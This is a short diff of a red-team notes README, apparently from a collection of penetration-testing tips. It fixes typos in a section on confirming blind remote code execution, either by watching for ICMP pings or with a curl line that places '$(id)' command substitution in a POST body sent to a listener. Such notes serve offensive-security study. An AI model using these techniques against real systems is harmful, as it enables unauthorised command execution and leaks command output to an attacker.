ihebski/A-Red-Teamer-diaries/README.md

 You can specify a number of pings with -c agrments, If ICMP requests recieved, RCE achieved

 ## Curl
-Execute commands and recieve data under the POST requet
+Execute commands and recieve data with the POST request
 ```bash
 curl -d '$(id)' 127.0.0.1:9988
 ```